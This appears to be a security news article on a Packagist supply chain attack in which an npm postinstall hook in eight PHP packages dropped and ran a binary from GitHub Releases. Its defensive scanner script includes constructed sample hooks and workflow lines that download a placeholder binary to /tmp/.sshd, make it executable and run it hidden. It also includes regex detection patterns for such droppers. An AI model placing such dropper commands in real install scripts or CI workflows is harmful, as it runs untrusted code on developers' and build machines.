Packagist Supply Chain Attack Infects 8 Packages Using GitHub-Hosted Linux Malware

MAY 23, 2026 — A coordinated software supply chain attack has compromised eight packages on Packagist, the default package repository for PHP's Composer dependency manager. The attackers injected an install-time script that downloads and executes a Linux binary hosted on GitHub Releases.

Security researchers say the campaign highlights an evolving tactic in which attackers blur boundaries between programming ecosystems to evade detection and maximize impact.

Malicious Code Hidden Outside Composer Files

According to security firm Socket, the affected packages are ordinary Composer (PHP) libraries, but the malicious code was not placed in the PHP dependency metadata, composer.json, where a Composer-focused scanner would look.

Instead, the attackers added the script to package.json, the npm manifest that many PHP projects ship alongside composer.json for front-end tooling. Composer ignores package.json entirely, so the hook fires only when someone runs an npm, yarn or pnpm install inside the affected package, for example during a front-end build step in CI. The placement lets the malware slip past scans that inspect only PHP metadata while still executing wherever JavaScript tooling runs alongside the PHP application.

Experts describe this as a “cross-ecosystem attack technique,” where threat actors exploit multiple package formats within a single project to avoid detection.

Malware Downloaded from GitHub Releases

The compromised packages were modified to carry a post-install hook that the JavaScript package manager runs automatically once the package's files are unpacked. This hook:

  • Downloads a Linux binary from a GitHub Releases URL
  • Writes it to a hidden file in the system temp directory (/tmp/.sshd, a name that mimics the SSH daemon)
  • Marks the file executable with chmod
  • Launches the binary detached in the background, with its output discarded

The GitHub repository that hosted the payload has since been taken down, so researchers have not been able to fully analyze the final-stage binary.

Affected Packages Identified

The attack impacted multiple widely used development packages, including:

  • moritz-sauer-13/silverstripe-cms-theme
  • crosiersource/crosierlib-base
  • devdojo/wave
  • devdojo/genesis
  • katanaui/katana
  • elitedevsquad/sidecar-laravel
  • r2luna/brain
  • baskarcm/tzi-chat-ui

Security analysts note that every compromised version was a dev-main branch build rather than a tagged release. Projects that depend on a branch pull whatever commit the branch currently points to, and such branches are often monitored far less strictly than stable releases.
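The practical follow-up to that observation is to find out which of your own locked dependencies track a branch instead of a tag. The script below is an added example written for this page, not tooling from Socket or from any of the affected projects; the composer.lock fragment it parses is a constructed sample, and its package names, URLs and commit hashes are placeholders.

```python
"""List Composer dependencies resolved from a VCS branch rather than a tagged
release, the situation in which a compromised dev-main branch gets pulled in.
Added example for this page; the composer.lock below is a constructed sample."""
import json
from typing import Dict, List


def dev_branch_packages(lock_text: str, include_dev: bool = True) -> List[Dict[str, str]]:
    """Return every package in a composer.lock whose version is a branch
    (Composer writes these as "dev-<branch>" or "<alias>-dev"), with the commit
    it was resolved to, so the reference can be compared against upstream."""
    lock = json.loads(lock_text)
    sections = ["packages"] + (["packages-dev"] if include_dev else [])
    hits = []
    for section in sections:
        for pkg in lock.get(section, []):
            version = pkg.get("version", "")
            if not (version.startswith("dev-") or version.endswith("-dev")):
                continue  # tagged release: changing it needs a new tag, not just a push
            source = pkg.get("source") or {}
            dist = pkg.get("dist") or {}
            hits.append({
                "name": pkg.get("name", "?"),
                "version": version,
                "section": section,
                "url": source.get("url") or dist.get("url", ""),
                # The exact commit Composer installed; the branch moves, this does not.
                "reference": source.get("reference") or dist.get("reference", ""),
            })
    return hits


def format_report(hits: List[Dict[str, str]]) -> str:
    """One line per branch-tracking dependency, abbreviated commit included."""
    if not hits:
        return "no branch-tracking dependencies"
    return "\n".join(
        f"{h['section']}: {h['name']} @ {h['version']} ({h['reference'][:12]})" for h in hits
    )


# Constructed composer.lock fragment: names, URLs and hashes are placeholders.
SAMPLE_LOCK = json.dumps({
    "packages": [
        {"name": "example/stable-lib", "version": "v2.3.1",
         "source": {"type": "git", "url": "https://github.com/example/stable-lib.git",
                    "reference": "1111111111111111111111111111111111111111"}},
        {"name": "example/tracking-main", "version": "dev-main",
         "source": {"type": "git", "url": "https://github.com/example/tracking-main.git",
                    "reference": "2222222222222222222222222222222222222222"}},
    ],
    "packages-dev": [
        {"name": "example/tooling", "version": "2.x-dev",
         "dist": {"type": "zip",
                  "url": "https://api.github.com/repos/example/tooling/zipball/3333333333333333333333333333333333333333",
                  "reference": "3333333333333333333333333333333333333333"}},
    ],
})

if __name__ == "__main__":
    print(format_report(dev_branch_packages(SAMPLE_LOCK)))
```

Run it against a real composer.lock by reading the file into `dev_branch_packages`. Anything it lists is a dependency whose next `composer update` can pull arbitrary new commits; the `reference` field is what you would diff against the upstream branch when checking whether a lock was resolved before or after a suspicious push.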

Attack Spreads Across GitHub Ecosystem

Investigators found references to the malicious payload in at least 777 files across GitHub, suggesting the campaign is broader than the eight Packagist packages first identified. In some cases the downloader was also embedded in GitHub Actions workflow files, so it executes on the CI runner during automated builds rather than on a developer's machine.

This indicates the attackers were not relying on a single execution path but were trying to trigger the malware at several stages of the development pipeline, both at dependency installation and during CI builds.

Security Risks and Impact

The install hook runs attacker-controlled commands during dependency installation or CI build stages. Security researchers warn that even with the final-stage binary unavailable, the hook itself is a serious finding because it:

  • Executes arbitrary commands at install time, with the privileges of the user or CI runner performing the install
  • Disables TLS certificate verification for the download
  • Suppresses error output, so a failed or partial run leaves no trace in install logs
  • Detaches the payload into a hidden background process
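The install-hook steps listed under "Malware Downloaded from GitHub Releases" and the behaviours listed just above are exactly the things an audit script can look for before any JavaScript tooling runs. The script below is an added example written for this page, not Socket's tooling and not code from any of the affected packages. It parses vendored package.json files, examines only the lifecycle hooks that npm, yarn and pnpm run unattended, and applies the same indicator patterns line by line to GitHub Actions workflow files. The sample inputs are constructed stand-ins that reproduce the described pattern, not the real payload, whose exact text the page does not reproduce; the GitHub URL, package names and paths in them are placeholders.

```python
"""Audit npm lifecycle hooks vendored alongside Composer packages, and CI
workflow files, for the dropper behaviour described on this page.
Added example for this page; not Socket's tooling and not code from any of the
affected packages. Sample inputs are constructed stand-ins, not the real payload."""
import json
import re
from typing import Dict, List, NamedTuple

# npm, yarn and pnpm run these automatically during "install"; Composer never does.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic indicators mapped to the behaviours in the article: fetch a binary from
# GitHub Releases, drop it under /tmp, chmod +x, detach it, silence errors, skip TLS
# checks. These are triage patterns, not a signature of the actual payload.
INDICATORS = [
    ("remote_download", re.compile(r"\b(curl|wget)\b.*https?://")),
    ("github_release_url", re.compile(r"github\.com/[^\s\"']+/releases/download/")),
    ("tmp_dropper", re.compile(r"/tmp/\.?[\w-]+")),
    ("chmod_exec", re.compile(r"\bchmod\s+(\+x|[0-7]*7[0-7]*)\b")),
    ("tls_disabled", re.compile(r"(\s-k\b|--insecure|--no-check-certificate|NODE_TLS_REJECT_UNAUTHORIZED=0)")),
    ("error_suppressed", re.compile(r"(2>\s*/dev/null|\|\|\s*true\b)")),
    ("background_exec", re.compile(r"(\bnohup\b|\bsetsid\b|\bdisown\b|&\s*$)")),
    ("pipe_to_shell", re.compile(r"\|\s*(ba)?sh\b")),
]


class Finding(NamedTuple):
    path: str
    hook: str       # lifecycle hook name, or "line N" for raw text scans
    indicator: str
    command: str


def scan_command(path: str, hook: str, command: str) -> List[Finding]:
    """One Finding per indicator class that matches the command."""
    return [Finding(path, hook, name, command) for name, rx in INDICATORS if rx.search(command)]


def scan_package_json(path: str, text: str) -> List[Finding]:
    """Only lifecycle hooks run unattended; "build" or "test" need an explicit npm run."""
    try:
        data = json.loads(text)
    except json.JSONDecodeError:
        return [Finding(path, "-", "unparseable_json", text[:80])]
    scripts = data.get("scripts")
    if not isinstance(scripts, dict):
        return []
    findings: List[Finding] = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if isinstance(cmd, str):
            findings.extend(scan_command(path, hook, cmd))
    return findings


def scan_text(path: str, text: str) -> List[Finding]:
    """Line-by-line scan for workflow YAML or shell files; no YAML parser needed."""
    findings: List[Finding] = []
    for n, line in enumerate(text.splitlines(), 1):
        findings.extend(scan_command(path, f"line {n}", line))
    return findings


def scan_files(files: Dict[str, str]) -> List[Finding]:
    """Dispatch on file name: package.json is parsed, everything else is scanned raw."""
    out: List[Finding] = []
    for path, text in files.items():
        scanner = scan_package_json if path.endswith("package.json") else scan_text
        out.extend(scanner(path, text))
    return out


def risk_score(findings: List[Finding]) -> int:
    """Distinct indicator classes hit; three or more on one hook is worth quarantining."""
    return len({f.indicator for f in findings})


# Constructed samples. The URL, names and paths are placeholders, not the real ones.
SAMPLE_FILES = {
    "vendor/example/widget/package.json": json.dumps({
        "name": "widget", "version": "1.0.0",
        "scripts": {
            "build": "vite build",
            "postinstall": "curl -fsSL -k https://github.com/example/example/releases/download/v1/agent "
                           "-o /tmp/.sshd 2>/dev/null; chmod +x /tmp/.sshd; nohup /tmp/.sshd >/dev/null 2>&1 &",
        },
    }),
    "vendor/example/clean/package.json": json.dumps({"scripts": {"build": "vite build", "test": "vitest"}}),
    ".github/workflows/build.yml": (
        "steps:\n"
        "  - run: npm ci\n"
        "  - run: wget --no-check-certificate -qO /tmp/.sshd https://github.com/example/example/releases/download/v1/agent"
        " && chmod +x /tmp/.sshd && /tmp/.sshd &\n"
    ),
}

if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        print(f"{f.path} [{f.hook}] {f.indicator}: {f.command[:60]}")
```

Run it from the repository root after `composer install` and before any `npm install`, feeding it every package.json under vendor/ plus the workflow files. The constructed postinstall hook above trips seven of the eight indicator classes; a benign package with only build and test scripts trips none. The indicators are deliberately loose (a legitimate script may well use /tmp or `2>/dev/null`), so treat a single hit as a prompt to read the script and a high `risk_score` as grounds to quarantine the package. The structural fix is to stop lifecycle hooks from running at all on machines that do not need them: set `ignore-scripts=true` in the project's `.npmrc` or run `npm ci --ignore-scripts`, and use `composer install --no-scripts` where Composer's own scripts are not required.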

Experts say these behaviors are typical of advanced supply chain attacks designed to maintain persistence and evade security tools.

Growing Threat to Open-Source Ecosystems

The incident reflects a broader rise in supply chain attacks targeting open-source ecosystems such as npm, Packagist, and PyPI. Attackers increasingly exploit trusted development tools and dependencies to infiltrate software pipelines used by millions of applications worldwide.

Security researchers are urging developers to audit the install scripts of every dependency, not only the PHP ones; to disable automatic execution of install hooks (npm's ignore-scripts setting and Composer's --no-scripts flag do this); and to monitor third-party dependencies for unexpected changes, especially any that are pinned to a branch rather than a tagged version.
